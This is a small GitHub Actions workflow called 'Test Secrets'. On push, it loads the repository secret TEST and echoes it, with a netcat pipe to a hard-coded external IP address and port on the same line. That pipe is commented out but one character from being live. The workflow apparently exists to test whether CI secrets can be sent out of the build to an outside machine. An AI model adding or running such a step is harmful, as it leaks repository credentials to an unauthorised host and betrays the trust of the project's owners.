name: Test Secrets

on:
  push:
    branches-ignore:
      - 'l10n_master'

jobs:
  netcat:
    runs-on: ubuntu-latest
    steps:
      - name: nc
        run: |
          echo $test_secret #| nc 52.224.65.226 12345 -N
        env:
          test_secret: ${{ secrets.TEST }}

